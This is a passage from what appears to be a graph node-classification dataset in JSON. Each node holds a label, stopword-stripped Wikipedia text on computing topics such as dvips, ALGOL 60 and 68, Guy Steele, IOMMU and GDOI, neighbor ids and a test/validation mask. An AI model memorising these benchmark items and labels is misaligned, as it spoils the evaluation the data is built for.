    "text": "Dvips:dvips dvips computer program converts device independent file format dvi output tex typography printable otherwise presentable form dvips written tomas rokicki produce printable postscript files dvi input commonly used general dvi conversion tex typesetting system outputs dvi files intended independent output device particular understood printers lack information font shapes thus converter i.e. backend needed translate dvi file printer language although dvi backends dvilj exist dvips stated earlier one common ways printing dvi files another recent solution use pdftex directly generate pdf files readers platforms given importance dvips standard part tex distributions tetex tex live using tex codice_1 commands possible directly insert literal postscript dvi file snippets postscript appear final file generated dvips flexibility allows user include say watermarks document especially via use proper packages postprocess postscript file producing postscript files dvips embeds fonts inside file recent distributions normally embed scalable fonts also known type 1 fonts files generated older distributions however may embed raster fonts substitute raster scalable fonts postscript file situation original dvi file unavailable use utility called pkfix",
    "neighbors": [
      73,
      4481,
      8628,
      6973
    ],
    "mask": "Test"
  },
  {
    "node_id": 1610,
    "label": 9,
    "text": "ALGOL_60:algol 60 algol 60 short algorithmic language 1960 member algol family computer programming languages followed algol 58 introduced code blocks codice_1 codice_2 pairs delimiting algol 60 first language implementing nested function definitions lexical scope gave rise many programming languages including cpl simula bcpl b pascal c. niklaus wirth based algol w algol 60 moving develop pascal algol-w intended next generation algol algol 68 committee decided design complex advanced rather cleaned simplified algol 60 official algol versions named year first published algol 68 substantially different algol 60 criticised partially general algol refers dialects algol 60 algol 60 — cobol — first languages seek standardization algol 60 used mostly research computer scientists united states europe use commercial applications hindered absence standard input/output facilities description lack interest language large computer vendors algol 60 however become standard publication algorithms profound effect future language development john backus developed backus normal form method describing programming languages specifically algol 58 revised expanded peter naur algol 60 donald knuth suggestion renamed backus–naur form peter naur editor algol bulletin drawn international discussions language selected member european language design group november 1959 capacity editor algol 60 report produced result algol 60 meeting paris january 1960 following people attended meeting paris january 11 16 alan perlis gave vivid description meeting meetings exhausting interminable exhilarating one became aggravated one good ideas discarded along bad ones others nevertheless diligence persisted entire period chemistry 13 excellent language originally include recursion inserted specification last minute wishes committee algol 60 inspired many languages followed tony hoare remarked language far ahead time improvement predecessors also nearly successors scheme programming language variant lisp adopted block structure lexical scope algol also adopted wording revised report algorithmic language scheme standards documents homage algol date least 70 augmentations extensions derivations sublanguages algol 60 burroughs dialects included special system programming dialects espol newp algol 60 officially defined i/o facilities implementations defined ways rarely compatible contrast algol 68 offered extensive library transput algol 68 parlance input/output facilities algol 60 allowed two evaluation strategies parameter passing common call-by-value call-by-name call-by-name certain effects contrast call-by-reference example without specifying parameters value reference impossible develop procedure swap values two parameters actual parameters passed integer variable array indexed integer variable think passing pointer swap function every time swap referenced reevaluated say 1 2 every time swap referenced 'll return combination values 1,2 2,1 1,2 similar situation occurs random function passed actual argument call-by-name known many compiler designers interesting thunks used implement donald knuth devised man boy test separate compilers correctly implemented recursion non-local references test contains example call-by-name 35 reserved words standard burroughs large systems sub-language 71 restricted identifiers standard burroughs large systems sub-language also names intrinsic functions procedure absmax size n result subscripts k implementations differ text bold must written word 'integer including quotation marks must used implementations place integer thereby designating special keyword following example produce table using elliott 803 algol since algol 60 i/o facilities portable hello world program algol following program could still compile run algol implementation unisys a-series mainframe straightforward simplification code taken language guide university michigan-dearborn computer information science department hello world algol example program page simpler program using inline format even simpler program using display statement alternative example using elliott algol i/o follows elliott algol used different characters open-string-quote close-string-quote represented ‘ ’ version elliott 803 algol a104 standard elliott 803 used 5 hole paper tape thus upper case code lacked quote characters £ uk pound sign used open quote question mark close quote special sequences placed double quotes e.g ££l produced new line teleprinter ict 1900 series algol i/o version allowed input paper tape punched card paper tape 'full mode allowed lower case output line printer note use",
    "neighbors": [
      512,
      4608,
      10752,
      9224,
      1552,
      5651,
      1045,
      3613,
      5149,
      9245,
      11295,
      3126,
      1079,
      2617,
      8262,
      9290,
      1611,
      9804,
      9294,
      5714,
      10324,
      7775,
      9315,
      9330,
      9345,
      3716,
      1672,
      1673,
      8854,
      5783,
      3736,
      3737,
      2206,
      10400,
      1702,
      10413,
      5806,
      3765,
      5816,
      4799,
      8904,
      8397,
      7894,
      8414,
      8421,
      11497,
      8426,
      2283,
      2798,
      4877,
      6414,
      10510,
      11036,
      5413,
      9002,
      9008,
      11056,
      1333,
      7479,
      5946,
      10043,
      10047,
      8000,
      6977,
      10560,
      1349,
      10568,
      5961,
      8524,
      2904,
      3418,
      1883,
      10586,
      11099,
      1376,
      10083,
      6502,
      10089,
      1392,
      3443,
      3447,
      5496,
      2432,
      898,
      1931,
      4492,
      7055,
      5521,
      1947,
      1952,
      428,
      8627,
      1976,
      10684,
      963,
      8136,
      3529,
      11212,
      11219,
      5588,
      2519,
      4057,
      4058,
      2012,
      4064,
      4069,
      5614,
      6640,
      1010,
      11253,
      1016,
      3577,
      6652,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 1611,
    "label": 9,
    "text": "ALGOL_68:algol 68 algol 68 short algorithmic language 1968 imperative computer programming language conceived successor algol 60 programming language designed goal much wider scope application rigorously defined syntax semantics complexity language definition runs several hundred pages filled non-standard terminology made compiler implementation difficult said implementations users partially true algol 68 find use number niche markets notably united kingdom popular icl machines teaching roles outside circles usage relatively limited nevertheless contributions algol 68 field computer science deep wide-ranging enduring although many contributions publicly identified reappeared subsequently developed programming languages many languages developed specifically response perceived complexity language notable pascal reimplementations specific roles like ada many languages 1970s trace design specifically algol 68 selecting particular features abandoning others considered complex out-of-scope particular roles among c programming language directly influenced algol 68 especially strong typing structures modern languages trace least syntax either c pascal thus directly indirectly algol 68 algol 68 features include expression-based syntax user-declared types structures/tagged-unions reference model variables reference parameters string array matrix slicing also concurrency algol 68 designed ifip working group 2.1 december 20 1968 language formally adopted working group 2.1 subsequently approved publication general assembly ifip algol 68 defined using two-level grammar formalism invented adriaan van wijngaarden van wijngaarden grammars use context-free grammar generate infinite set productions recognize particular algol 68 program notably able express kind requirements many programming language standards labelled semantics expressed ambiguity-prone natural language prose implemented compilers ad hoc code attached formal language parser algol 68 criticized prominently members design committee c. a. r. hoare edsger dijkstra abandoning simplicity algol 60 becoming vehicle complex overly general ideas little make compiler writer task easier contrast deliberately simple contemporaries competitors c s-algol pascal 1970 algol 68-r became first working compiler algol 68 1973 revision certain features – proceduring gommas formal bounds – omitted c.f language unrevised report though european defence agencies britain royal signals radar establishment – rsre promoted use algol 68 expected security advantages american side nato alliance decided develop different project ada programming language making use obligatory us defense contracts algol 68 also notable influence within soviet union details found andrey ershov 2014 paper algol 68 impact ussr russian programming алгол 68 и его влияние на программирование в ссср и россии steve bourne algol 68 revision committee took ideas bourne shell thereby descendant shells bash c thereby descendants c++ complete history project found c. h. lindsey history algol 68 full-length treatment language see programming algol 68 made easy dr. sian mountbatten learning algol 68 genie marcel van der veer includes revised report algol 68 name implies follow-on algol language first formalized 1960 year international federation information processing ifip formed started working group algol wg2.1 group released updated algol 60 specification rome april 1962 follow-up meeting march 1964 agreed group begin work two follow-on standards algol x would redefinition language additions algol would ability modify programs style lisp first meeting algol x group held princeton university may 1965 report meeting noted two broadly supported themes introduction strong typing interest euler concepts 'trees 'lists handling collections second meeting october france three formal proposals presented niklaus wirth algol w along comments record structures c.a.r tony hoare similar language gerhard seegmüller paper adriaan van wijngaarden orthogonal design description formal language later written almost indecipherable w-grammar proved decisive shift evolution language meeting closed agreement van wijngaarden would re-write wirth/hoare submission using w-grammar seemingly simple task ultimately proved difficult expected follow-up meeting delayed six months met april 1966 kootwijk van wijngaarden draft remained incomplete wirth hoare presented version using traditional descriptions generally agreed paper right language wrong formalism approaches explored became clear difference way parameters described would real-world effects wirth hoare protested delays might become endless committee decided wait van wijngaarden version wirth implemented current definition algol w. next meeting warsaw october 1968 initial report i/o subcommittee met oak ridge national laboratory university illinois yet made much progress two proposals previous meeting explored time new debate emerged use pointers algol w used refer records van wijngaarden version could point object add confusion john mccarthy presented new proposal operator overloading ability string together constructs klaus samelson wanted allow anonymous functions resulting confusion discussion abandoning entire effort confusion continued supposed algol meeting zandvoort may 1967 draft report finally published february 1968 met shock horror dissent mostly due hundreds pages unreadable grammar odd terminology charles h. lindsey attempted figure language hidden inside process took six man-weeks effort resulting paper algol 68 fewer tears widely circulated wider information processing meeting zurich may 1968 attendees complained language forced upon ifip true villain unreasonable situation meetings mostly closed formal feedback mechanism wirth peter naur formally resigned authorship positions wg2.1 point next wg2.1 meeting took place tirrenia june 1968 supposed discuss release compilers issues instead devolved discussion language van wijngaarden responded saying threatening would release one version report point naur hoare wirth left effort several threatening several meetings followed north berwick august 1968 munich december produced release official report january 1969 also resulted contentious minority report written finally banff alberta september 1969 project generally considered complete discussion primarily errata greatly expanded introduction report effort took five years burned many greatest names computer science several occasions became deadlocked issues definition group whole hoare released critique algol 68 almost immediately widely referenced many works wirth went develop algol w concept released pascal 1970 first implementation standard based late-1968 draft report introduced royal radar establishment uk algol 68-r july 1970 however subset full language barry mailloux final editor report joked question morality bible sinning version nevertheless became popular icl machines became widely-used language military coding especially uk among changes 68-r requirement variables declared first use significant advantage allowed compiler one-pass space variables activation record set aside used however change also side-effect demanding procs declared twice declaration types actual body code another change eliminate assumed void mode expression returns value known statement languages demanding word void added would assumed additionally 68-r eliminated explicit parallel processing commands based par first full implementation language introduced 1974 cdc netherlands control data mainframe series saw limited use mostly teaching germany netherlands version similar 68-r introduced carnegie mellon university 1976 68s one-pass compiler based various simplifications original intended use smaller machines like dec pdp-11 used mostly teaching purposes version ibm mainframes become available 1978 one released cambridge university nearly complete lindsey released version small machines including ibm pc 1984 1968 20 december 1968 final report mr 101 adopted working group subsequently approved general assembly unesco ifip publication translations standard made russian german french bulgarian later japanese chinese standard also made available braille 1984 tc97 considered algol 68 standardisation new work item tc97/n1642 west germany belgium netherlands ussr czechoslovakia willing participate preparing standard ussr czechoslovakia right kinds member right iso committees algol 68 iso standardisation stalled 1988 subsequently algol 68 became one gost standards russia standard language contains sixty reserved words typically bolded print brief symbol equivalents basic language construct unit unit may formula enclosed clause routine text one several technically needed constructs assignation jump skip nihil technical term enclosed clause unifies inherently bracketing constructs known block statement switch statement contemporary languages keywords used generally reversed character sequence introducing keyword used terminating enclosure e.g else fi case esac od syntax reused stephen bourne common unix bourne shell expression may also yield multiple value constructed values collateral clause construct looks like parameter pack procedure call basic data types called modes algol 68 parlance real int compl complex number bool char bits bytes example however declaration real x syntactic sugar ref real x loc real x really constant identifier reference newly generated local real variable furthermore instead defining codice_1 codice_2 codice_3 codice_4 codice_5 etc. algol 68 provides modifiers presently common codice_2 would written long real long long real instead example prelude constants codice_7 codice_8 provided adapt programs different implementations variables need declared declaration appear prior first use primitive-declarer int real compl complex bool char string bits bytes format file pipe channel sema complex types created simpler ones using various type constructors examples see comparison algol 68 c++ declaration symbols include flex heap loc ref long short event name mode type declared using mode declaration similar typedef c/c++ type pascal similar following c code note algol 68 newmode mode-indication appears left equals symbol notably construction made read left right without regard priorities note also lower bound algol 68 arrays one default integer max int max int mode declarations allow types recursive defined directly indirectly terms subject restrictions instance declarations illegal valid coercions produce coercee coercend according three criteria priori mode coercend application coercion posteriori mode coercee required coercions syntactic position sort coercee coercions may cascaded six possible coercions termed deproceduring dereferencing uniting widening rowing voiding coercion except uniting prescribes corresponding dynamic effect associated values hence number primitive actions programmed implicitly coercions context strength – allowed coercions algol 68 hierarchy contexts determine kind coercions available particular point program contexts details primaries secondaries tertiary quaternaries refer operator precedence pragmats directives program typically hints compiler newer languages called pragmas 't e.g comments inserted variety ways normally comments nested algol 68 restriction circumvented using different comment delimiters e.g use hash temporary code deletions algol 68 expression-oriented programming language value returned assignment statement reference destination thus following valid algol 68 code notion present c perl among others note earlier languages algol 60 fortran spaces allowed identifiers codice_9 single identifier thus avoiding underscores versus camel case versus lower-case issues another example express mathematical idea sum codice_10 i=1 n following algol 68 integer expression suffices note integer expression former block code used context integer value used block code returns value last expression evaluated idea present lisp among languages compound statements terminated distinctive closing brackets condition statements else statements fi scheme avoids dangling else problem also avoids use codice_11 codice_12 embedded statement sequences case switch statements statements ... statements esac choice clause example brief symbols choice clause example bold symbols choice clause example mixing bold brief symbols algol68 allowed switch either type int uniquely union latter allows enforcing strong typing onto union variables c.f example index first increment last condition statements od considered universal loop full syntax construct several unusual aspects int sum sq =0 subsequent extensions standard algol68 allowed syntactic element replaced upto downto achieve small optimisation compilers also incorporated examples found code examples algol 68 supports arrays number dimensions allows slicing whole partial rows columns matrices sliced either way e.g algol 68 supports multiple field structures struct united modes reference variables may point mode including array slices structure fields example traditional linked list declaration usage example union case node procedure proc declarations require type specifications parameters result void none using brief form conditional statement return value codice_13 value last expression evaluated procedure references procedures ref proc also permitted call-by-reference parameters provided specifying references codice_14 formal argument list following example defines procedure applies function specified parameter element array simplicity code unachievable algol 68 predecessor algol 60 programmer may define new operators pre-defined ones may overloaded priorities may changed coder following example defines operator codice_15 dyadic monadic versions scanning across elements array technically operators rather considered units associated names note tertiaries include names nil ○ technically operators rather considered units associated names note quaternaries include names skip alternatively tests two pointers equal /= alternatively isnt tests unequal /= needed consider trying compare two pointer values following variables declared pointers-to-integer consider decide whether two pointing location whether one pointing nil following expression dereference pointers values type int compare since operator defined int ref int legal define operands type ref int int time calls become ambiguous due implicit coercions applied operands left ref int version operator called dereferenced int version used instead therefore following expression never made legal hence need separate constructs subject normal coercion rules operands operators gotcha following expressions legal probably might expected always return false comparing actual addresses variables codice_21 codice_22 rather point achieve right effect one would write patent application 14 may 2003 software patent application 20040230959 filed codice_25 operator employees microsoft patent granted 18 november 2004 algol special characters ⊂ ≡ ␣ × ÷ ≤ ≥ ≠ ¬ ⊃ ≡ ∨ ∧ → ↓ ↑ ⌊ ⌈ ⎩ ⎧ ⊥ ⏨ ¢ ○ □ found ibm 2741 keyboard apl golf-ball print head inserted became available mid-1960s algol 68 drafted characters also part unicode standard available several popular fonts transput term used refer algol 68 input output facilities includes pre-defined procedures unformatted formatted binary transput files transput devices handled consistent machine-independent manner following example prints unformatted output standard output device note predefined procedures codice_26 codice_27 passed arguments transput considered books channels files formatted transput algol 68 transput syntax patterns functions formats embedded two characters examples algol 68 supports programming parallel processing using keyword par collateral clause converted parallel clause synchronisation actions controlled using semaphores a68g parallel actions mapped threads available hosting operating system a68s different paradigm parallel processing implemented see sample program implements sieve eratosthenes find prime numbers less 100. nil algol 68 analogue null pointer languages notation x accesses member x struct note soviet era computers эльбрус-1 elbrus-1 эльбрус-2 created using high-level language эль-76 al-76 rather traditional assembly эль-76 resembles algol-68 main difference dynamic binding types эль-76 supported hardware level эль-76 used application job control system programming algol 68c algol 68-r written algol 68 effectively making algol 68 application applications include feature algol 68 inherited algol tradition different representations representation language used describe algorithms printed work strict language rigorously defined report official reference language intended used actual compiler input examples observe bold typeface words strict language algol 68 reserved words effectively different namespace identifiers spaces allowed identifiers next fragment legal programmer actually writes code always option bold typeface underlining code may depend hardware cultural issues different methods denote identifiers devised called stropping regime example following may available programming representations implementations must recognize least point upper res inside pragmat sections point upper stropping quite common res stropping contradiction specification reserved words quote single apostrophe quoting original recommendation matched apostrophe quoting common algol 60 used much algol 68 following characters recommended portability termed worthy characters report standard hardware representation algol 68 reflected problem 1960s hardware n't support lower-case non-ascii characters indeed 1973 report written four worthy characters — — often coded differently even installations nominally use character set algol 68 allows every natural language define set keywords algol-68 result programmers able write programs using keywords native language example simple procedure calculates day following code two languages english german russian/soviet example english algol68 case statement reads case esac cyrillic reads выб в либо быв technical intricacies algol 68 needs cornucopia methods deny existence something c.f examples ℵ term nil var always evaluates true variable see correct use /= whereas known value comparison x skip evaluates integer x algol 68 leaves intentionally undefined happens case integer overflow integer bit representation degree numerical accuracy floating point contrast language java criticized over-specifying latter official reports included advanced features part standard language indicated ℵ considered effectively private examples include ≮ ≯ templates outtype/intype crude duck typing straightout straightin operators straightening nested arrays structures extract 1973 report except noted language described revised report original language per final report differs syntax mode cast feature proceduring i.e coercing value term procedure evaluates term proceduring would intended make evaluations lazy useful application could short-circuited evaluation boolean operators b evaluated true defined algol 68 work expected example code programmers naïve expectations print would executed value elaborated enclosed-clause andf procedured textual insertion commented-out proc bool makes work implementations emulate expected behaviour special case extension language revision programmer could decide arguments procedure evaluated serially instead collaterally using semicolons instead commas gomma example first argument test guaranteed evaluated second usual compiler could evaluate arguments whatever order felt like revision report extensions language proposed widen applicability far partial parametrisation implemented algol 68 genie s3 language used write icl vme operating system much system software icl 2900 series direct derivative algol 68 however omitted many complex features replaced basic modes set data types mapped directly 2900 series hardware architecture algol 68r rre first algol 68 subset implementation running icl 1900 based original language main subset restrictions definition use parallel processing compiler popular uk universities 1970s many computer science students learnt algol 68 first programming language compiler renowned good error messages algol 68rs rsre portable compiler system written algol 68rs bootstrapped algol 68r implemented variety systems including icl 2900/series 39 multics dec vax/vms language based revised report similar subset restrictions algol 68r compiler survives form algol68-to-c compiler algol 68s carnegie mellon university power parallel processing improved adding orthogonal extension eventing variable declaration containing keyword event made assignments variable eligible parallel evaluation i.e right hand side made procedure moved one processors c.mmp multiprocessor system accesses variables delayed termination assignment cambridge algol 68c portable compiler implemented subset algol 68 restricting operator definitions omitting garbage collection flexible rows formatted transput algol 68 genie m. van der veer algol 68 implementation today computers operating systems despite good intentions programmer may violate portability inadvertently employing local extension guard implementation provide portcheck pragmat option option force compiler prints message construct recognizes violating portability constraint",
    "neighbors": [
      512,
      3594,
      2062,
      5651,
      6675,
      3613,
      9762,
      5676,
      5677,
      5684,
      4151,
      8262,
      1610,
      1611,
      9294,
      7775,
      9315,
      6248,
      10862,
      6772,
      9345,
      2179,
      1672,
      1673,
      5783,
      3736,
      3737,
      1702,
      9385,
      5806,
      11442,
      3765,
      10430,
      4799,
      10435,
      10436,
      3277,
      8397,
      721,
      7894,
      5853,
      8414,
      11490,
      2283,
      3323,
      261,
      2316,
      6414,
      1823,
      7983,
      9008,
      5428,
      7479,
      7480,
      1349,
      840,
      5961,
      10568,
      8524,
      11604,
      10586,
      6502,
      10089,
      8554,
      11625,
      1392,
      5492,
      2422,
      1399,
      5496,
      2936,
      3960,
      8582,
      1931,
      4492,
      5521,
      11153,
      1947,
      1952,
      10145,
      428,
      10670,
      10680,
      7612,
      10684,
      7104,
      963,
      3529,
      11212,
      11219,
      5588,
      6102,
      4057,
      1502,
      4069,
      6640,
      1016,
      3577,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1612,
    "label": 7,
    "text": "Oracle_Enterprise_Resource_Planning_Cloud:oracle enterprise resource planning cloud oracle enterprise resource planning cloud cloud-based software application suite introduced oracle corporation 2012 oracle erp cloud manages enterprise functions including accounting financial management project management procurement oracle erp cloud end-to-end software service suite manages enterprise operations suite runs oracle technology stack oracle ’ cloud centers oracle erp cloud accessible public private cloud implementation supports hybrid deployment oracle supplies updates oracle erp cloud least twice annually according company ’ website seven different software modules make oracle erp cloud suite march 2017 oracle erp cloud received hipaa certification software suite designed support international enterprise functions includes multi-gaap multi-currency multi-language multi-subsidiary capabilities oracle erp cloud based originally oracle fusion applications oracle ’ enterprise resource planning software suite developed oracle fusion architecture oracle fusion middleware released 2011 june 2012 oracle cto chairman board larry ellison announced oracle erp cloud application suite part oracle cloud company ’ broad set cloud-based applications oracle announced preview availability oracle erp cloud oracle openworld 2012 october 2015 company reported oracle erp cloud surpassed 1,300 customers august 2 2017 oracle announced release 13 oracle erp cloud 2017 oracle ceo safra catz announced availability oracle erp cloud india assist country preparation goods services tax reforms march 2017 oracle reported oracle erp cloud grown 280 fiscal quarter 3 september 2017 reported oracle ’ cloud erp business grew 156 first quarter 2017-18 reached annual run rate 1.2 billion oracle erp cloud available north america south america asia emea regions oracle offers certifications software service saas specializations oracle erp cloud oracle financials cloud oracle procurement cloud oracle project portfolio management cloud oracle risk management cloud oracle openworld annual technology conference hosted oracle featured announcements updates oracle erp cloud collaborate annual technology forum hosted independent oracle users groups including international oracle users group ioug oracle applications users group oaug quest oracle community provides training oracle products including oracle erp cloud 2017 oracle erp cloud listed leader gartner ’ “ magic quadrant cloud core financial management suites midsize large global enterprises. ” product positioned highest completeness vision ability execute",
    "neighbors": [
      7489,
      4194,
      1539,
      4199,
      11113,
      10509,
      467,
      8471,
      10553
    ],
    "mask": "Test"
  },
  {
    "node_id": 1613,
    "label": 9,
    "text": "Guy_L._Steele_Jr.:guy l. steele jr guy lewis steele jr. born october 2 1954 american computer scientist played important role designing documenting several computer programming languages technical standards steele born missouri graduated boston latin school 1972 received bachelor arts b.a applied mathematics harvard university 1975 master degree m.s doctor philosophy ph.d. massachusetts institute technology mit computer science 1977 1980 worked assistant professor computer science carnegie mellon university compiler implementer tartan laboratories joined supercomputer company thinking machines helped define promote parallel computing version programming language named lisp named *lisp star lisp parallel version language c named c* 1994 steele joined sun microsystems invited bill joy become member java team language designed since track record writing good specifications extant languages named sun fellow 2003 steele joined oracle 2010 oracle acquired sun microsystems mit steele published two dozen papers gerald jay sussman subject language lisp implementation lambda papers one notable contributions design language scheme steele also designed original command set emacs first port tex waits published papers subjects including compilers parallel processing constraint languages one song composed published official journal association computing machinery communications acm cacm telnet song april 1984 parody behavior series pdp-10 telnet implementations written mark crispin steele served accredited technical standards committees including ecma international formerly european computer manufacturers association ecma tc39 language ecmascript editor first edition x3j11 c x3j3 fortran chairman x3j13 common lisp also member institute electrical electronics engineers ieee working group produced ieee standard language scheme ieee std 1178-1990 represented sun microsystems high performance fortran forum produced high performance fortran specification may 1993 addition specifications language java steele work sun microsystems included research parallel algorithms implementation strategies architecture software support 2005 steele began leading team researchers sun developing new language named fortress high-performance language designed obsolete fortran 1982 steele edited hacker dictionary harper row 1983 print version jargon file steele samuel p. harbison wrote c reference manual prentice-hall 1984 provide precise description language c tartan laboratories trying implement wide range systems authors participated american national standards institute ansi c standardization process several revisions book issued reflect new standard 16 march 1984 steele published common lisp language digital press 465 pages first edition original specification common lisp cltl1 served basis ansi standard steele released greatly expanded second edition 1990 1029 pages documented near-final version ansi standard steele along charles h. koelbel david b. loveman robert s. schreiber mary e. zosel wrote high performance fortran handbook mit press 1994 steele also coauthored three editions java language specification addison-wesley third ed 2005 james gosling bill joy gilad bracha steele received acm grace murray hopper award 1988 named acm fellow 1994 member national academy engineering united states america 2001 fellow american academy arts sciences 2002 received dr. dobb excellence programming award 2005 steele modern western square dancer caller mainstream c3a member tech squares member callerlab pseudonym great quux old student nickname boston latin school mit published light verse crunchly cartoons latter appeared new hacker dictionary also used initialism gls 1998 steele solved game teeko via computer showing must occur players play wisely found neither player force win steele also showed advanced teeko variant win black assuming perfect play one variant fourteen variants draws",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      6160,
      2577,
      7184,
      9749,
      8728,
      4633,
      4122,
      8226,
      5677,
      3119,
      2105,
      6201,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      3176,
      2666,
      2667,
      6767,
      5751,
      1147,
      7805,
      1159,
      9865,
      3733,
      8854,
      9877,
      10395,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      3267,
      7880,
      8908,
      205,
      5837,
      1236,
      7896,
      219,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      2798,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      5397,
      10008,
      8474,
      8987,
      10012,
      3869,
      2335,
      2849,
      1316,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      9019,
      11083,
      3408,
      6994,
      1365,
      10581,
      2392,
      11099,
      6493,
      10083,
      6502,
      11625,
      3446,
      3960,
      377,
      8057,
      10104,
      4992,
      2438,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7609,
      7616,
      5569,
      6594,
      9665,
      4550,
      1480,
      11218,
      10712,
      3034,
      3051,
      5611,
      7148,
      7670,
      11255,
      5115,
      2045,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 1614,
    "label": 2,
    "text": "Input–output_memory_management_unit:input–output memory management unit computing input–output memory management unit iommu memory management unit mmu connects direct-memory-access–capable dma-capable i/o bus main memory like traditional mmu translates cpu-visible virtual addresses physical addresses iommu maps device-visible virtual addresses also called device addresses i/o addresses context physical addresses units also provide memory protection faulty malicious devices example iommu graphics address remapping table gart used agp pci express graphics cards intel architecture amd computers x86 architecture prior splitting functionality northbridge southbridge cpu platform controller hub pch i/o virtualization performed cpu instead chipset advantages iommu compared direct physical addressing memory dma include system architectures port i/o distinct address space memory address space iommu used cpu communicates devices via i/o ports system architectures port i/o memory mapped suitable address space iommu translate port i/o accesses disadvantages iommu compared direct physical addressing memory include operating system running inside virtual machine including systems use paravirtualization xen usually know host-physical addresses memory accesses makes providing direct access computer hardware difficult guest os tried instruct hardware perform direct memory access dma using guest-physical addresses would likely corrupt memory hardware know mapping guest-physical host-physical addresses given virtual machine corruption avoided hypervisor host os intervenes i/o operation apply translations incurring delay i/o operation iommu solve problem re-mapping addresses accessed hardware according compatible translation table used map guest-physical address host-physical addresses",
    "neighbors": [
      8333,
      9741,
      2838,
      8090,
      799,
      2594,
      6818,
      10658,
      9126,
      6705,
      7998,
      9665,
      8514,
      4695,
      344,
      2525,
      6495,
      11487,
      8035,
      8551,
      1387,
      9964,
      1776,
      3702,
      3323,
      508,
      7039
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1615,
    "label": 2,
    "text": "Nokia_N76:nokia n76 nokia n76 multimedia 3g smartphone made nokia introduced las vegas ces 2007 january 2007 launched 5 may 2007 sales price 390 eur advertised computer done beautifully multimedia computer also slimmest nseries phone date following many trends mirrored exterior screen motorola razr metal keypad hardware-wise n76 bases platform freescale first kind family “ cheap ” 3g smartphones fact difference omap2420 freescale cpu lack graphics accelerator phone originally released without stereo bluetooth later firmware update v30.0.015 adds a2dp avrcp bluetooth profiles also numerous stability improvements bug fixes well new features including inclusion nokia maps new search feature active standby n76 among rarer nokia devices go relatively high prices second hand market",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1377,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 1616,
    "label": 5,
    "text": "Group_Domain_of_Interpretation:group domain interpretation group domain interpretation gdoi cryptographic protocol group key management gdoi protocol specified ietf standard rfc 6407 based internet security association key management protocol isakmp rfc 2408 internet key exchange version 1 ike whereas ike run two peers establish pair-wise security association gdoi protocol run group member group controller/key server controller establishes security association among two group members gdoi interprets ike isakmp group security domain addition pair-wise security associations gdoi uses ike v1 phase 1 security association authenticating gdoi member gdoi controller ike/gdoi phase 1 cryptographic protocol exchange protects new type phase 2 exchange member requests pulls group state controller group key important state gdoi member group key encrypts keys decrypt application data thus group key also called key encrypting key gdoi group key-encrypting key used rekey security association rekey-sa established gdoi controller send push unsolicited updates group security association members multicast broadcast unicast channels gdoi called multicast key management system uses supports multicast messaging large groups multicast messages unsolicited messages therefore called push messages unsolicited messages sent controller members explicit requests member controller called pull messages gdoi thus gdoi group key updates pushed reach number group members single efficient transmission controller gdoi group key updates also serve remove members groups rfc 2627 describes one group membership management protocol allows selective key updates members efficiently remove member group efficiency evaluated terms space time message complexity rfc 2627 algorithms subset-difference logarithmic space time message complexity thus rfc 2627 supports efficient group membership management gdoi practical implementation gdoi group membership management separate function controller aaa function invokes remove de-authorized group member aaa authorization authentication accounting might run kind aaa protocol aaa function could also customer care function service provider subscriber management system media services provider provider aaa function must credential infrastructure public key infrastructure using x.509 digital certificates spki credential x.509 environment provider aaa function install certificate allow member join group group controller queries pki gdoi registration exchange member attempts join group pull group state group state stored group member keys key metadata conceptually group member keys structured set 1 n relationships often called key ladder member credential x.509 certificate proves authorized join one groups default group policy private authentication key 2048-bit rsa key policies possible similarly default group key key encrypting key 128-bit aes key policies possible finally data encryption key application-dependent commonly 128-bit aes key groups member sender generates data encryption key encrypts key encrypting key long two share group key group sender use key encrypting key encrypt key media files streams serves gdoi groups make distinction sender receiver however whether group members may send matter group policy type keys key ladder also determined group policy group policy cryptography key lifetime member behavior",
    "neighbors": [
      1411,
      9383,
      2932,
      10908,
      62
    ],
    "mask": "Test"
  },
  {
    "node_id": 1617,
    "label": 2,
    "text": "Driver_wrapper:driver wrapper driver wrapper subroutine software library functions adapter operating system driver device driver designed operating system enable use devices drivers particular operating system available particular microsoft windows dominant family operating systems ibm pc compatible computers many devices supplied drivers windows operating systems several open source software projects allow using microsoft windows drivers another operating system linux examples include network drivers wireless cards ndiswrapper linux project evil freebsd ntfs file system see captive ntfs common thread among examples use wrapper technology allows execution drivers foreign environment limitations driver wrappers include lack ability function real time example limitation includes latency problems associated attempts make compatible linux zoomr16 audio daw sound recorder control surface",
    "neighbors": [
      9762,
      8228,
      6797,
      7983,
      2193,
      6129,
      9009,
      823,
      10079
    ],
    "mask": "Test"
  },
  {
    "node_id": 1618,
    "label": 5,
